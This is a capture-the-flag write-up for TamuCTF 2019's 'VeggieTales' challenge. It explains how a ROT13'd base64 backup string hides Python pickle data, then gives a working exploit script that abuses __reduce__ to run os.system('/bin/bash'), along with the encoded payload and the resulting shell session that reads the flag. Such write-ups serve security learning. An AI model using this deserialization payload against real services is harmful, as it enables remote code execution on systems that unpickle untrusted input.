TamuCTF 2019 - VeggieTales (pwn)

This challenge was a deserialization vulnerability with Pickle, it was pretty trivial but I lost too much time on some shit.

 

It's my favorite show to watch while practicing my python skills! I've seen episode 5 at least 13 times.
nc pwn.tamuctf.com 8448

ROFL ROFL ROFL

Once connected you had a choices menu with 4 options :

C:\Users\switch
? nc pwn.tamuctf.com 8448
Do you like VeggieTales??
1. Add an episode to your watched list
2. Print your watch list
3. Backup your watch list
4. Load your watch list

This challenge made me instantly think about a deserialization vulnerability because of the backup and load action. Moreover in the description it says " I've seen episode 5 at least 13 times.", the 5th episode is called "Dave and the Giant Pickle".

 

After you added at least one episode to your list you can backup it as base64 encoded data.

1. Add an episode to your watched list
2. Print your watch list
3. Backup your watch list
4. Load your watch list
1
1.  Wheres God When Im S-Scared?
2.  God Wants Me to Forgive Them!?!
3.  Are You My Neighbor?
4.  Rack, Shack and Benny
5.  Dave and the Giant Pickle
[...]
47. Noahs Ark
Enter an episode (by number) to add to your watched list: 1
episode added!
1. Add an episode to your watched list
2. Print your watch list
3. Backup your watch list
4. Load your watch list
3
Episode list backup string (Don't lose it!): tNAqpDOLVNNNNQRhVPOKnTIlMKZtE29xVSqbMJ4tFJ0tHl1GL2SlMJD/pDSuYt==

I ran some tests in order to indentify the base64 encoded data, save, save2 and save3 are backups from different episodes and test is a serialized object with Pickle.

switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ xxd save
00000000: b4d0 2aa4 338b 4cd3 4d35 0575 62f3 949c  ..*.3.L.M5.ub...
00000010: 9132 a36e 3a55 2135 2f34 6d23 64a5 a73c  .2.n:U!5/4m#d..<
00000020: a2a5 a44e 2c5e                           ...N,^
switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ xxd save2
00000000: b4d0 2aa4 338b 4a33 4d35 00f6 62f3 8f30  ..*.3.J3M5..b..0
00000010: 94b5 a94c 6d2c 9e71 5541 1b30 538f 3092  ...Lm,.qUA.0S.0.
00000020: 34a4 34ae 62                             4.4.b
switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ xxd save3
00000000: b4d0 2aa4 335b 24eb 4d34 d365 02fe 2d18  ..*.3[$.M4.e..-.
00000010: 9f72 5534 a130 f3b4 9d31 ed0f 3c9a 5512  .rU4.0...1..<.U.
00000020: 389c a124 348b 6c34 d34d 670a 6155 211b  8..$4.l4.Mg.aU!.
00000030: 3053 8aa3 6e71 30a5 b3a8 98ed 236c ba2c  0S..nq0.....#l.,
00000040: a5b1 553f 7355 1bae a774 4f30 5e         ..U?sU...tO0^
switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ xxd test 
00000000: 2864 7030 0a53 2774 6573 7427 0a70 310a  (dp0.S'test'.p1.
00000010: 4934 0a73 2e                             I4.s.

I lost time here because I could not identify the saved data, it did not correspond to a Pickle object.

 

I tried doing xor, substraction and addtion with 13 (they watched it 13 time from the description) but nothing seemed to led to a Pickle object. Then I had like a revelation :

witch :: pain $ echo tNAqpDOLVNNNNQRhVPOKnTIlMKZtE29xVSqbMJ4tFJ0tHl1GL2SlMJD/pDSuYt== |  tr 'A-Za-z' 'N-ZA-Mn-za-m' | base64 -d | xxd
00000000: 8003 5d71 0058 2000 0000 312e 2020 5768  ..]q.X ...1.  Wh
00000010: 6572 6573 2047 6f64 2057 6865 6e20 496d  eres God When Im

It was a simple rot 13 but on the base64 encoded data, knowing that we just have to serialize our payload base64 encoding then rot13 it !

 

I already use this payload in the article about codegate quals impel down challenge, I will use it again :)

switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ cat xploit.py 

#!/usr/bin/python
#encoding:utf-8
import pwn
import os
import cPickle

class Exploit(object):
	def __reduce__(self):
		return (os.system, ('/bin/bash',))


print cPickle.dumps(Exploit()) 

switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ python xploit.py | base64 | tr 'A-Za-z' 'N-ZA-Mn-za-m'
L3Oip2y4PaA5p3EyoDcjZDbbHlpiLzyhY2Wup2taPaNlPaEjZjcFpQDXYtb=

Then we just have to load it with the restore option ! 

switch :: pain /mnt/hgfs/nextcloud/CTF/tamu2019/pwn/veggietales $ nc pwn.tamuctf.com 8448
Do you like VeggieTales??
1. Add an episode to your watched list
2. Print your watch list
3. Backup your watch list
4. Load your watch list
4
Load your backed up list here: L3Oip2y4PaA5p3EyoDcjZDbbHlpiLzyhY2Wup2taPaNlPaEjZjcFpQDXYtb=
ls
flag.txt
server.py
cat flag.txt
gigem{d0nt_7rust_th3_g1ant_pick1e}